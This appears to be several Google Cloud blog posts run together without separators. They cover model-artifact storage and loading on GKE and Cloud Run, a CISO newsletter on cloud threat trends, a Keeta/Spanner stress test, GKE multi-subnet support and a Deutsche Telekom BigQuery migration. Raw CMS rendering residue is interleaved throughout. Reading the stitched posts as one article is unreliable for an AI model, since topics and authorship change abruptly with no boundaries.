The compute plane—be it GKE, Cloud Run, Vertex AI, or even a local development machine—handles execution: loading the model into GPU memory and processing inference requests. This separation provides immense strategic flexibility. The same versioned model artifact in a Cloud Storage bucket can be consumed by a GKE cluster for a high-throughput batch prediction job; by a Cloud Run service for bursty, real-time inference; and by a fully managed Vertex AI Endpoint for ease of use, all without duplicating the underlying asset. This storage method prevents model sprawl and ensures that all parts of the organization are working from a single, auditable source.
To implement this architecture effectively, you need a structured approach to artifact organization. Best practices suggest the use of a Cloud Storage bucket structure that facilitates robust MLOps workflows. This approach includes using clear naming conventions that incorporate model names and versions (for example, a bucket named gs://my-model-artifacts/gemma-2b/v1.0/) and separate prefixes or even distinct buckets for different environments (such as dev, staging, and prod).
With this approach, access control should be managed with precision using Identity and Access Management (IAM) policies. For example, CI/CD service accounts for production deployments should only have read access to the production models bucket, data scientists might have write access only to development or experimentation buckets, and automated tests should gate promotion of development images to production pipelines.
You can also make specific objects or entire buckets publicly readable through IAM roles like roles/storage.objectViewer assigned to the allUsers principal, though this should be used with caution. This disciplined approach to storage and governance transforms Cloud Storage from a simple file repository into the foundational layer of a scalable and secure MLOps ecosystem.
That scalability is critical for performance, especially when serving large models. Model load is a bursty, high throughput workload, with up to thousands of GPUs trying to load the same model weights simultaneously as quickly as possible. Anywhere Cache should always be used for this scenario, which can provide up to 2.5 TB/s in BW at lower latency. As a managed, SSD-backed caching layer for Cloud Storage, Anywhere Cache colocates data with your compute resources. It transparently serves read requests from a high-speed local cache, benefiting any Cloud Storage client in the zone—including GKE, Compute Engine, and Vertex AI—and dramatically reducing model load times.
Quantization
Quantization is the process of reducing the precision of a model’s weights (for example, from 32-bit floating point to 4-bit integer). From a storage perspective, the size of a model’s weights is a function of its parameters and their precision (precision × number of parameters = model size). By reducing the precision, you can dramatically shrink the model’s storage footprint.
Quantization has two major benefits:
Smaller model size: A quantized model takes up significantly less disk space, leading to faster downloads and less memory consumption.
Faster inference: Many modern CPUs and GPUs can perform integer math much faster than floating-point math.
For the best results, use modern, quantization-aware model formats like GGUF, which are designed for fast loading and efficient inference.
Cache warming
For many LLMs, the initial processing of a prompt is the most computationally expensive part. You can pre-process common prompts or a representative sample of your data during the build process and save the resulting cache state. Your application can then load this warmed cache at startup, allowing it to skip the expensive initial processing for common requests. Serving frameworks like VLLM provide capabilities like Automated Prefix Caching that support this.
Loading the artifact
Choosing the right model loading strategy is a critical architectural decision. Here’s a breakdown of the most common approaches:
Cloud Storage FUSE CSI driver: The recommended approach for most modern ML serving workloads on GKE is to use the Cloud Storage FUSE CSI driver. This approach mounts a Cloud Storage bucket directly into the pod’s filesystem as a volume, so the application can read the model as if it were a local file. This implementation provides near-instantaneous pod startup and fully decouples the model from the code.
init container download: A more flexible approach is to use a Kubernetes init container to download the model from Cloud Storage to a shared emptyDir volume before the main application starts. This implementation decouples the model from the image, so that you can update the model without rebuilding the container. However, this implementation can significantly increase pod startup time and add complexity to your deployment. This approach is a good option for medium-sized models where the startup delay is acceptable.
Concurrent download: Similar to the init container, you can download the model concurrently within your application. This approach can be faster than a simple gsutil cp command because it allows for parallelization. A prime example of this is the vLLM Run:ai Model Streamer, which you can enable when you use the vLLM serving framework. This feature parallelizes the download of large model files by splitting them into chunks and fetching them concurrently, which significantly accelerates the initial load.
Baking into the image: The simplest approach is to copy the model directly into the container image during the docker build process. This approach makes the container self-contained and portable, but it also creates very large images, which can be slow to build and transfer. This tight coupling of the model and code also means that any model update requires a full image rebuild. This strategy is best for small models or quick prototypes where simplicity is the top priority.
Direct access with Cloud Storage FUSE
The Cloud Storage FUSE CSI driver is a significant development for ML workloads on GKE. It lets you mount a Cloud Storage bucket directly into your pod’s filesystem, so that the objects in the bucket appear as local files. This configuration is accomplished by injecting a sidecar container into your pod that manages the FUSE mount. This setup eliminates the need to copy data, resulting in near-instantaneous pod startup times.
It’s important to note that although the Cloud Storage FUSE CSI driver is compatible with both GKE Standard and Autopilot clusters, Autopilot’s security constraints prevent the use of the SYS_ADMIN capability, which is typically required by FUSE. The CSI driver is designed to work without this privileged access, but it’s a critical consideration when you deploy to Autopilot.
Performance tuning
Out of the box, Cloud Storage FUSE is a convenient way to access your models. But to unlock its full potential for read-heavy inference workloads, you need to tune its caching and prefetching capabilities.
Parallel downloads: For very large model files, you can enable parallel downloads to accelerate the initial read from Cloud Storage into the local file cache. This is enabled by default when file caching is enabled.
Metadata caching & prefetching: The first time that you access a file, FUSE needs to get its metadata (like size and permissions) from Cloud Storage. To keep the metadata in memory, you can configure a stat cache. For even better performance, you can enable metadata prefetching, which proactively loads the metadata for all files in a directory when the volume is mounted. You can enable metadata prefetching by setting the metadata-cache:stat-cache-max-size-mb and metadata-cache:ttl-secs options in your mountOptions configuration.
For more information, see the Performance tuning best practices in the Cloud Storage documentation. For an example of a GKE Deployment manifest that mounts a Cloud Storage bucket with performance-tuned FUSE settings, see the sample configuration YAML files.
Advanced storage on GKE
Cloud Storage FUSE offers a direct and convenient way to access model artifacts. GKE also provides specialized, high-performance storage solutions designed to eliminate I/O bottlenecks for the most demanding AI/ML workloads. These options, Google Cloud Managed Lustre, and Hyperdisk ML, offer alternatives that can provide high performance and stability by leveraging dedicated parallel file and block storage.
Managed Lustre
For the most extreme performance requirements, Google Cloud Managed Lustre provides a fully managed, parallel file system. Managed Lustre is designed for workloads that demand ultra-low, sub-millisecond latency and massive IOPS, such as HPC simulations and AI training and inference jobs. It’s POSIX-compliant, which ensures compatibility with existing applications and workflows.
This service, powered by DDN’s EXAScaler, scales to multiple PBs and streams data up to 1 TB/s, making it ideal for large-scale AI jobs that need to feed hungry GPUs or TPUs. It’s intended for high-throughput data access rather than long-term storage archiving. Although its primary use case is persistent storage for training data and checkpoints, it can handle millions of small files and random reads with extremely low latency and high throughput. It’s therefore a powerful tool for complex inference pipelines that might need to read or write many intermediate files.
To use Managed Lustre with GKE, you first enable the Managed Lustre CSI driver on your GKE cluster. Then, you define a StorageClass resource that references the driver and a PersistentVolumeClaim request to either dynamically provision a new Lustre instance or connect to an existing one. Finally, you mount the PersistentVolumeClaim as a volume in your pods, which lets them access the high-throughput, low-latency parallel file system.
Hyperdisk ML
Hyperdisk ML is a network block storage option that’s purpose-built for AI/ML workloads, particularly for accelerating the loading of static data like model weights. Unlike Cloud Storage FUSE, which provides a file system interface to an object store, Hyperdisk ML provides a high-performance block device that can be pre-loaded, or hydrated, with model artifacts from Cloud Storage.
Its standout feature for inference serving is its support for READ_ONLY_MANY access, which allows a single Hyperdisk ML volume to be attached as a read-only device to up to 2,500 GKE nodes concurrently. In this architecture, every pod can access the same centralized, high-performance copy of the model artifact without duplication. You can therefore use it to scale out stateless inference services that provide high throughput with smaller TB sized volumes. Note that the read-only nature of Hyperdisk ML introduces operational process changes each time a model is updated.
To integrate Hyperdisk ML, you first create a Hyperdisk ML volume and populate it with your model artifacts from Cloud Storage. Then you define a StorageClass resource and a PersistentVolumeClaim request in your GKE cluster to make the volume available to your pods. Finally, you mount the PersistentVolumeClaim as a volume in your Deployment manifest.
Serving the artifact on Cloud Run
Cloud Run also supports mounting Cloud Storage buckets as volumes, which makes it a viable platform for serving ML models, especially with the addition of GPU support. You can configure a Cloud Storage volume mount directly in your Cloud Run service definition. This implementation provides a simple and effective way to give your serverless application access to the models that are stored in Cloud Storage.
Here is an example of how to mount a Cloud Storage bucket as a volume in a Cloud Run service by using the gcloud command-line tool:
code_block
<ListValue: [StructValue([(‘code’, ‘gcloud run deploy my-ml-service \rn –image gcr.io/my-project/my-ml-app:latest \rn –add-volume=name=model-volume,type=cloud-storage,bucket=my-gcs-bucket \rn –add-volume-mount=volume=model-volume,mount-path=/models’), (‘language’, ”), (‘caption’, <wagtail.rich_text.RichText object at 0x7fa15cfe4eb0>)])]>
Automating the artifact lifecycle
To automate the artifact lifecycle, you build an ingestion pipeline that includes a scripted Cloud Run job, and then you stream directly to Cloud Storage.
Building an ingestion pipeline
For a production environment, you need an automated, repeatable process for ingesting models, which you can build by using a Cloud Run job. The core of this pipeline is a Cloud Run job that runs a containerized script. This job can be triggered manually or on a schedule to create a robust, serverless pipeline for transferring models from Hugging Face into your Cloud Storage bucket.
Streaming directly to Cloud Storage
Instead of downloading the entire model to the Cloud Run job’s local disk before uploading it to Cloud Storage, we can stream it directly. The obstore library is perfect for this. It lets you treat a Hugging Face repository and a Cloud Storage bucket as object stores and stream data between them asynchronously. This is highly efficient, especially for very large models, because it minimizes local disk usage and maximizes network throughput.
Here is a simplified Python snippet that shows the core logic of streaming a file from Hugging Face to Cloud Storage by using the obstore library:
code_block
<ListValue: [StructValue([(‘code’, ‘import osrnimport asynciornfrom urllib.parse import urlparsernfrom huggingface_hub import hf_hub_urlrnimport obstore as obsrnfrom obstore.store import GCSStore, HTTPStorernrnasync def stream_file_to_gcs(file_name, hf_repo_id, gcs_bucket_name, gcs_path_prefix):rn “””Streams a file from a Hugging Face repo directly to Cloud Storage.”””rn rn # 1. Configure the source (Hugging Face) and destination (Cloud Storage) storesrn http_store = HTTPStore.from_url(“https://huggingface.co”)rn gcs_store = GCSStore(bucket=gcs_bucket_name)rnrn # 2. Get the full download URL for the filern full_download_url = hf_hub_url(repo_id=hf_repo_id, filename=file_name)rn download_path = urlparse(full_download_url).pathrn rn # 3. Define the destination path in Cloud Storagern gcs_destination_path = os.path.join(gcs_path_prefix, file_name)rnrn # 4. Get the download stream from Hugging Facern streaming_response = await obs.get_async(http_store, download_path)rnrn # 5. Stream the file to Cloud Storagern await obs.put_async(gcs_store, gcs_destination_path, streaming_response)rnrn print(f”Successfully streamed ‘{file_name}’ to Cloud Storage.”)rnrn# Example usage:rn# asyncio.run(stream_file_to_gcs(“model.safetensors”, “google/gemma-2b”, “my-gcs-bucket”, “gemma-2b-model/”))’), (‘language’, ‘lang-py’), (‘caption’, <wagtail.rich_text.RichText object at 0x7fa15cfe4b50>)])]>
Conclusion
By moving your model artifacts out of your container images and into a centralized Cloud Storage bucket, you gain a tremendous amount of flexibility and agility. This decoupled approach simplifies your CI/CD pipeline, accelerates deployments, and lets you manage your code and models independently.
For the most demanding ML workloads on GKE, the Cloud Storage FUSE CSI driver is an excellent choice, providing direct, high-performance access to your models without a time-consuming copy step. For even greater performance, consider using Managed Lustre or Hyperdisk ML. When you combine these options with an automated ingestion pipeline and build-time best practices, you can create a truly robust, scalable, and future-proof ML serving platform on Google Cloud.
The journey to a mature MLOps platform is an iterative one. By starting with a solid foundation of artifact-centric design, you can build a system that is not only powerful and scalable today, but also adaptable to the ever-changing landscape of machine learning. Share your tips on managing model artifacts with me on LinkedIn, X, and Bluesky.
Welcome to the first Cloud CISO Perspectives for August 2025. Today, our Office of the CISO’s Bob Mechler and Anton Chuvakin dive into the key trends and evolving threats that we tracked in our just-published Cloud Threat Horizons report.
As with all Cloud CISO Perspectives, the contents of this newsletter are posted to the Google Cloud blog. If you’re reading this on the website and you’d like to receive the email version, you can subscribe here.
aside_block
<ListValue: [StructValue([(‘title’, ‘Get vital board insights with Google Cloud’), (‘body’, <wagtail.rich_text.RichText object at 0x7fc8c04f1400>), (‘btn_text’, ‘Visit the hub’), (‘href’, ‘https://cloud.google.com/solutions/security/board-of-directors?utm_source=cloud_sfdc&utm_medium=email&utm_campaign=FY24-Q2-global-PROD941-physicalevent-er-CEG_Boardroom_Summit&utm_content=-&utm_term=-‘), (‘image’, <GAEImage: GCAT-replacement-logo-A>)])]>
New Cloud Threat Horizons details evolving threats — and defenses
By Bob Mechler, director, Office of the CISO, and Anton Chuvakin, security advisor, Office of the CISO
Bob Mechler, director, Office of the CISO
Threat actors are leaning into cyberattacks against cloud service providers and honing their tactics to specifically target recovery mechanisms and supply chains — often to achieve high-value compromises.
That’s one of the top conclusions from our newest Threat Horizons Report, a free biannual publication sharing strategic intelligence on cloud threats that draws on research from Google Cloud’s Office of the CISO, Google Threat Intelligence Group (GTIG), Mandiant Consulting, and intelligence, security, and product teams.
Anton Chuvakin, security advisor, Office of the CISO
These cyberattacks are starting from a frustratingly familiar place: Credential compromise and misconfiguration are still the leading entry points for threat actors in cloud environments.
“During the first half of 2025, weak or absent credentials were the predominant threat, accounting for 47.1% of incidents. Misconfigurations (29.4%) and API/UI compromises (11.8%) followed as the next most-frequently observed initial access vectors,” the report said.
These findings closely mirror our observations in previous Cloud Threat Horizons Reports, emphasizing the critical need for robust identity and access management and proactive vulnerability management.
As threat actors advance their methods for data exfiltration, identity compromise, supply chain attacks, and improving evasion and persistence techniques, Google Cloud security experts offer four critical insights into these evolving risks, supported by threat intelligence and risk mitigations.
The new report takes stock of the state of cloud security, and focuses on actionable recommendations for leaders and practitioners. As threat actors advance their methods for data exfiltration, identity compromise, supply chain attacks, and improving evasion and persistence techniques, Google Cloud security experts offer four critical insights into these evolving risks, supported by threat intelligence and risk mitigations.
1. Foundational vulnerabilities persist
A persistent challenge is the continued exploitation of basic security weaknesses in the cloud. Despite defensive advancements, the primary entry points for threat actors — credential compromise and misconfiguration — are driven by a lack of attention to cloud security fundamentals.
As we noted, these foundational issues accounted for a significant portion of incidents in the first half of 2025. Too many organizations struggle with these basics and we can not emphasize enough the importance of robust identity and access management and proactive vulnerability management — reach out to your cloud provider to ensure your metaphorical windows and doors are locked.
2. Attacking backups to pressure victims
Threat actors are increasingly targeting backup infrastructure to hinder recovery efforts. Financially-motivated attackers are now routinely compromising backup systems to ensure that organizations can’t restore data after a ransomware attack and coerce them into capitulating.
This shift emphasizes the critical importance of business continuity. Our report highlights the need for solutions, including Cloud Isolated Recovery Environment (CIRE), to provide a secure restore point. A robust disaster recovery plan, rooted in layered security, should go beyond relying solely on cloud backups.
3. MFA is effective, but not invulnerable
Multi-factor authentication (MFA) is a highly effective security measure. However, threat actors are developing more sophisticated methods to bypass it, particularly through social engineering to steal credentials and session cookies.
For example, the North Korean threat actor group UNC4899 used social media to trick employees into running malicious Docker containers and then steal the victim’s credentials and session cookies to gain access to cloud environments. In some instances, they used credential and cookie theft to bypass weaker MFA methods to avoid detection.
As Google Cloud and Workspace take steps to add additional layers of protection to the MFA process with passkeys and device-bound session credentials, cloud customers should also adopt a comprehensive defense-in-depth strategy. Robust session management and enhanced user awareness training can prove vital to mitigating MFA threats.
4. Evolving supply chain attacks
The supply chain continues to be a significant area of risk, and we’ve observed threat actors using trusted cloud services to host decoy files and payloads. The new Cloud Threat Horizons report details campaigns where seemingly-benign PDFs on legitimate cloud platforms were used to distract victims while malicious payloads were downloaded — a classic trust-exploitation attack.
It shouldn’t come as a surprise that adversaries are evolving their tactics to target personnel, recovery plans, and the inherent trust in platforms. CISOs and security leaders should encourage their organizations to evolve as well, from addressing individual vulnerabilities to building a resilient, end-to-end security program prepared for today’s threat landscape.
Level up your cloud security today
Effectively navigating today’s threats means that organizations should prioritize a defense-in-depth strategy that prioritizes identity security, robust recovery mechanisms, continuous vigilance against sophisticated social engineering and deception tactics, and supply chain integrity.
For more details on the threats facing cloud providers and users, and mitigations for those risks, you can download the new Cloud Threat Horizons report here.
aside_block
<ListValue: [StructValue([(‘title’, ‘Join the Google Cloud CISO Community’), (‘body’, <wagtail.rich_text.RichText object at 0x7fc8f9fcca00>), (‘btn_text’, ‘Learn more’), (‘href’, ‘https://rsvp.withgoogle.com/events/ciso-community-interest?utm_source=cgc-blog&utm_medium=blog&utm_campaign=2024-cloud-ciso-newsletter-events-ref&utm_content=-&utm_term=-‘), (‘image’, <GAEImage: GCAT-replacement-logo-A>)])]>
In case you missed it
Here are the latest updates, products, services, and resources from our security teams so far this month:
Your guide to Security Summit 2025: AI can help empower defenders, and also create new security challenges. Join us for this year’s Security Summit as we focus on those themes. Read more.
Complex, hybrid manufacturing needs strong security. Here’s how CISOs can get it done: Our Office of the CISO has developed actionable security guidance for hybrid manufacturing OT networks. Here’s what you need to know. Read more.
Forrester study: Customers cite 240% ROI with Google Security Operations: A new Forrester Consulting study on Google Security Operations found a 240% ROI over three years, with a net present value (NPV) of $4.3 million. Read more.
Google Cloud’s commitment to EU AI Act support: We intend to sign the European Union AI Act Code of Practice. Here’s what our European customers should know. Read more.
Introducing audit-only mode for Access Transparency: Introducing a new, lightweight audit-only mode for Access Approval to enable access approvals in an “on demand only” model. Read more.
Best practices to prevent dangling bucket takeovers: Storage buckets are where your data lives in the cloud, but sometimes they get forgotten. Here’s how to secure them against dangling bucket attacks. Read more.
New patch rewards program for OSV-SCALIBR: Participants in the program will be eligible to receive a financial reward for providing novel OSV-SCALIBR plugins for inventory, vulnerability, and secret detection. Read more.
Android’s pKVM first globally-certified software to earn SESIP Level 5: With this level of security assurance, Android is now positioned to securely support the next generation of high-criticality isolated workloads. This includes vital features, such as on-device AI workloads that can operate on ultra-personalized data, with the highest assurances of privacy and integrity. Read more.
Please visit the Google Cloud blog for more security stories published this month.
Exposing the risks of VMware vSphere Active Directory integration: The common practice of directly integrating vSphere with Microsoft Active Directory can simplify administration tasks, but also creates an attack path frequently underestimated due to misunderstanding the inherent risks. Read more.
Defending your VMware vSphere estate from UNC3944: Take a deep dive into the anatomy of UNC3944’s vSphere-centered attacks, and study our fortified, multi-pillar defense strategy for risk mitigation. Read more.
Ongoing SonicWall SMA exploitation campaign using the OVERSTEP backdoor: Google Threat Intelligence Group (GTIG) has identified an ongoing campaign by a suspected financially-motivated threat actor we track as UNC6148, targeting fully patched end-of-life SonicWall Secure Mobile Access (SMA) 100 series appliances. Read more.
Please visit the Google Cloud blog for more threat intelligence stories published this month.
Now hear this: Podcasts from Google Cloud
Google lessons for using AI agents to secure our enterprise: What can AI agents do for your organization’s security? Dominik Swierad, product development and strategy lead, AI and Sec-Gemini, joins hosts Anton Chuvakin and Tim Peacock for a lively chat on the state of using AI agents to improve security. Listen here.
Making security personal, the TikTok way: Kim Albarella, global head of security, TikTok, discusses security strategies, appropriate metrics, and balancing the need for localized compliance with the desire for a consistent global security posture with Anton and Tim. Listen here.
Defender’s Advantage: Securing protection relays in modern substations: Host Luke McNamara is joined by members of Mandiant Consulting’s Operational Technology team to discuss securing assets in the energy grid. Listen here.
To have our Cloud CISO Perspectives post delivered twice a month to your inbox, sign up for our newsletter. We’ll be back in a few weeks with more security-related updates from Google Cloud.
Keeta Network is a layer‑1 blockchain that unifies transactions across different blockchains and payment systems, eliminating the need for costly intermediaries, reducing fees, and enabling near‑instant settlements. By facilitating cross‑chain transactions and interoperability with existing payment systems, Keeta bridges the gap between cryptocurrencies and fiat, enabling a secure, efficient, and compliant global financial ecosystem.
Founded in 2022 and backed by Eric Schmidt, the former CEO of Google, Keeta has engineered its network to meet the stringent regulatory and operational requirements of financial institutions. Its on‑chain compliance protocols, including Know Your Customer (KYC) and Anti-Money Laundering (AML), ensure security and regulatory adherence. Keeta’s architecture also natively supports asset tokenization and digital identity, making it an ideal platform for stablecoins and real‑world asset transfers.
Recently, the company conducted a public, verified stress test of its network, which runs on Spanner, Google Cloud’s horizontally scalable, highly available operational database. The test demonstrated Keeta Network is capable of over 11 million transactions per second (TPS), significantly outperforming traditional layer-1 blockchains and opening new opportunities for what is possible with blockchain technology.
Keeta chose Spanner to power its distributed ledger due to its availability and elastic scalability, allowing the team to scale up or down as needed without downtime, costly over-provisioning, or risky manual administration. Google Cloud was also instrumental in helping to prepare and execute Keeta’s stress test, providing world-class infrastructure and technical guidance that helped validate the network’s real-world performance.
With Spanner’s fully managed operations and familiar relational developer experience, Keeta was able to focus on its network — not database infrastructure or distributed systems. At peak, Spanner handled 300,000 queries per second, reading and writing durable state to read balances, check permissions, resolve conflicts, and publish votes.
aside_block
<ListValue: [StructValue([(‘title’, ‘Try Google Cloud for free’), (‘body’, <wagtail.rich_text.RichText object at 0x7fc8f7fa1dc0>), (‘btn_text’, ‘Get started for free’), (‘href’, ‘https://console.cloud.google.com/freetrial?redirectPath=/welcome’), (‘image’, None)])]>
Building one network, ready for anything
On its mission to be the blockchain that connects all networks, Keeta created a unified platform that serves as a common ground for all payment networks and assets. Keeta Network’s underlying architecture is built on a directed acyclic graph (DAG) structure. Unlike traditional blockchain architecture, a DAG can process transactions in parallel across many individual accounts, reducing latency and avoiding common bottlenecks that plague other existing solutions.
The network utilizes a two-step voting process to approve or deny operations. Each transaction must be verified by a set of voting representatives, which occurs prior to updating any ledger. Individual steps rely on Spanner’s ACID (atomicity, consistency, isolation, durability) transactions and strict external consistency to ensure correctness as well as durability in the event of an outage or a network partition.
Keeta Network is unbounded by design, enabling it to scale horizontally to handle the increasing demand of participants. Similarly, Spanner’s scale-out architecture allows for linear read and write scaling in dozens of regions globally, all while maintaining consistency and latency.
Furthermore, representatives can be configured to scale down as throughput requirements decrease. Spanner ensures that scaling up or scale down are always online operations, even under the heaviest load. By dynamically adjusting the size of its Spanner instances based on actual demand, Keeta saves money.
Live test results showing more than 10M transactions per second at peak
Testing Keeta’s performance in the real world
Keeta’s Test Network consisted of four representative nodes, each issuing votes on the network. To process the targeted number of transactions, more than 30 million synthetic accounts generated over 25 billion transactions, reading and writing data to Spanner instances in four separate regions. It’s important to note that adding additional representative nodes did not materially change the complexity of the confirmation process.
In order to put the network through its paces, the stress test utilized a “fan out” approach to demonstrate its parallel throughput and immense scale. One account was used to begin the process of distributing funds to every account. This initial source account created numerous blocks, each containing 20 transactions each, which were then used to fund an additional 60,000 to 120,000 accounts. Each of these accounts, in turn, sent additional transactions. This process was repeated many times to reach the 30 million total accounts used during the test.
By showcasing this scalability, Keeta is one step closer to its vision – connecting the fragmented global economy. Existing solutions lack the scalability required for traditional financial traffic, making it impossible to connect global finance. Spanner and Google Cloud provide Keeta peace of mind and a significant technical leg up, delivering an infrastructure that can grow at the same pace as its network without significant rebuilding or unpredictable costs.
Keeta shows that blockchain technology is now capable of improving critical operations like cross-border payments, point-of-sale transactions, and asset transfers of all types. To put the addressable market into perspective, consider this: Tens of trillions of dollars worth of value are transferred across outdated financial systems daily — and Keeta Network has proven it has the speed, scale, and security to be the foundation for a new, interconnected ecosystem.
Leaders in industries like financial services, retail, and entertainment and media already rely on Spanner to power their most critical operational workloads. Learn more about how Spanner can help take the stress out of your organization’s next growth milestone and set your development teams up for success.
We are pleased to announce the preview of multi-subnet support for Google Kubernetes Engine (GKE) clusters. This enhancement removes single-subnet limitations, increasing scalability, optimizing resource utilization, and enhancing flexibility of your GKE clusters.
Multi-subnet support for GKE clusters allows you to add additional subnets to an existing GKE cluster, which can then be utilized by new node pools. This functionality is supported for all clusters, using GKE version 1.30.3-gke.1211000 or greater.
Benefits
Increased scalability: Clusters can now scale beyond the limits of a single subnets primary IP range.
Optimized resource utilization: IP addresses can be allocated more efficiently across multiple subnets, which reduces IP waste.
Enhanced flexibility: Adding subnets provides more flexibility in managing IP ranges for pods and services. Subnets can be updated without recreating the cluster so you can easily expand beyond initial cluster configurations.
Use case: Node IP exhaustion
Historically, GKE clusters are created on a single subnet, using its primary IP range. Once all the IPs in the primary range are used, the cluster can no longer add more nodes, and hence cannot expand or autoscale.
The IP exhaustion errors look something like this:
code_block
<ListValue: [StructValue([(‘code’, “[IP_SPACE_EXHAUSTED_WITH_DETAILS]: Instance ‘gke-cluster1-default-pool-45c508b2-2jqt’ creation failed: IP space of ‘projects/my-project/regions/us-west1/subnetworks/my-subnet1’ is exhausted.”), (‘language’, ”), (‘caption’, <wagtail.rich_text.RichText object at 0x7fc8e4f048b0>)])]>
To fix this error, we can now use the new multi-subnet feature to add subnets to the cluster. New node pools can use the new subnet and continue to grow the cluster. You can add multiple secondary ranges in the new subnets, in addition to the existing ability to add additional pod ranges to the default subnet. GKE will automatically pick a subnet during node pool creation based on the IP availability in the subnets.
Getting started
To take control of your GKE cluster’s growth, try adding subnets on-demand and scale fearlessly. Use your preferred method to start using multi-subnet support today!
CLI: For a complete list of CLI commands and options, check out the documentation.
API: To learn more about how to use the API, check the API documentation.
In today’s hyper-competitive telecommunications landscape, understanding and maximizing the Customer Lifetime Value (CLV) metric isn’t just a nice-to-have, it’s a strategic imperative. For Deutsche Telekom, accurate CLV calculations are the bedrock of informed decisions, driving crucial initiatives in customer acquisition, retention, and targeted marketing campaigns. The ability to predict and influence long-term customer relationships directly translates to sustained profitability and a competitive edge.
Initially, Deutsche Telekom’s Data Science team processed data within an on-premises data lake environment, leveraging Jupyter notebooks and PySpark. However, this reliance on legacy on-prem data lake systems was creating significant bottlenecks. These systems, designed for a different era of data volume and complexity, struggled to handle the massive datasets required for sophisticated CLV modeling. The result? Extended processing times, limited agility in data science experiments, and a growing gap between potential insights and actionable results.
This challenge demanded a transformative solution, leading Deutsche Telekom to embrace the power of modern cloud infrastructure, specifically Google Cloud’s BigQuery, to unlock the full potential of their data and accelerate their journey towards data-driven innovation.The core of this transformation was the migration of critical data science workloads, beginning with the CLV calculations, to BigQuery.
Deutsche Telekom decided that for distributed Python data processing, they wanted to move off of PySpark-based code and adopt BigQuery DataFrames a.k.a. BigFrames. BigFrames is an open-source Python library offered by Google that scales Python data processing by transpiling common Python data science APIs to BigQuery SQL. You can read more about BigFrames in the official introduction to BigFrames and can refer to the public git repository.
This decision was driven by three factors:
Keep it simple: By moving all the data processing to BigQuery, the company would be standardizing on a single data processing technology. This helps in administration and standardization across the organization.
Bet on universal skills: Python and Pandas are universal data science skills, but bringing in Spark would introduce additional learning. BigFrames is Pandas-like — it pushes processing to BigQuery. The move reduces the upskilling required to work on data science tasks.
Focus on business logic: Data science teams can focus on core business logic and less on the infrastructure required to make that logic work.
In other words, this move was not just a technical upgrade — it was a strategic shift towards a more agile, efficient, and insight-driven future. By leveraging BigQuery’s ability to process massive datasets quickly and efficiently, along with the tight integration of BigQuery DataFrames and its compatibility with familiar pandas and scikit-learn APIs, Deutsche Telekom aimed to eliminate the bottlenecks that had hindered their data science initiatives. This solution, centered around BigQuery and BigQuery DataFrames, provided the foundation for faster insights, improved decision-making, and ultimately, enhanced customer experiences.
aside_block
<ListValue: [StructValue([(‘title’, ‘Try Google Cloud for free’), (‘body’, <wagtail.rich_text.RichText object at 0x7fc8f9faa250>), (‘btn_text’, ”), (‘href’, ”), (‘image’, None)])]>
The migration journey
To realize these benefits, Deutsche Telekom meticulously planned a two-phase technical migration strategy, designed to minimize disruption and maximize the speed of achieving tangible business results.
The actual effort required to execute the two phases above was one person-week. Conversion with Gemini was 95% accurate and worked as expected. In the first phase, the most time was spent on manual data validation. Furthermore, around 70% of the pandas code automatically functioned as BigQuery DataFrames code as well. Some adjustments were required for data types and scalar functions.
Phase 1: Accelerated transition with AI-powered code conversion The initial phase focused on rapidly converting existing code to a format compatible with Google Cloud’s environment. This was significantly accelerated by leveraging advanced AI tools like Gemini, which streamlined the code conversion process. This allowed the team to focus on validating results and ensuring business continuity, rather than getting bogged down in lengthy technical rewrites.
Phase 2: Optimizing for cloud scalability and performance The second phase involved adapting the data processing to fully leverage BigQuery. This step was crucial for eliminating the performance bottlenecks they had experienced with the legacy systems. By aligning the data processing with BigQuery’s capabilities, Deutsche Telekom was able to unlock significant improvements in processing speed and scalability, allowing for faster and more insightful data analysis.
Key business benefits of the technical approach:
Deutsche Telekom’s technical migration strategy was not just about moving data; it was about strategically enabling faster, more scalable, and more reliable data-driven decisions. Among the benefits that they saw from this approach were:
Faster time to insight: The accelerated code conversion, powered by AI, significantly reduced the time required to migrate and validate the data, enabling quicker access to critical business insights.
Improved scalability and performance: The transition to BigQuery’s cloud-native architecture eliminated performance bottlenecks and provided the scalability needed to handle growing data volumes.
Reduced operational risk: The structured, two-phase approach minimized disruption and ensured a smooth transition, reducing operational risk.
Leveraging existing expertise: The use of familiar tools and technologies, combined with AI-powered assistance, allowed the team to leverage their existing expertise, minimizing the learning curve.
Of course, a project of this scale presented its own set of unique challenges, but each one was addressed with solutions that further strengthened Deutsche Telekom’s data capabilities and delivered increased business value.
Challenge 1: Ensuring data accuracy at scale Initially, the test data didn’t fully represent the complexities of their real-world data, potentially impacting the accuracy of critical calculations like CLV.
Solution: During the test phase, they relaxed the filters on the data sources to overcome the data size problem. They implemented the changes in both old and new versions of the code to reliably compare the outputs.
Challenge 2: Maintaining robust security and compliance Balancing the need for data access with stringent security and compliance requirements was an important consideration. BigQuery DataFrames documentation highlights the need for admin-level IAM privileges for some tasks like Remote Functions, which may not be possible in enterprise environments.
Solution: Deutsche Telekom developed customized IAM roles that met its security standards while enabling data access for authorized users. This helped ensure data security and compliance while supporting business agility.
By addressing these challenges strategically, Deutsche Telekom not only had a successful migration, but it also delivered tangible business benefits. Deutsche Telekom now has a more agile, scalable, and secure data platform, enabling them to make faster, more informed decisions and ultimately enhance their customer experience. This project demonstrates the power of cloud transformation in driving business value.
Deutsche Telekom’s successful migration to BigQuery was a strategic transformation, not just a technical one. By overcoming the limitations of their legacy systems and embracing cloud-based data processing, they’ve established a robust foundation for future innovation. This project underscores the power of strategic partnerships and collaborative problem-solving, showcasing how Google Cloud’s cutting-edge technologies and expert consulting can empower businesses to thrive in the data-driven future.
Ready to unlock the full potential of your data?
Whether you’re facing similar challenges with legacy systems or seeking to accelerate your data science initiatives, Google Cloud’s data platform can provide the solutions you need. Explore the capabilities of BigQuery and DataFrames, and discover how our expert consultants can guide you through a seamless cloud migration.
Contact Google Cloud Consulting today to discuss your specific needs and embark on your own journey towards data-driven innovation.
A special thanks to Googler Rohit Naidu, Strategic Cloud Engineer, for his contributions to this post.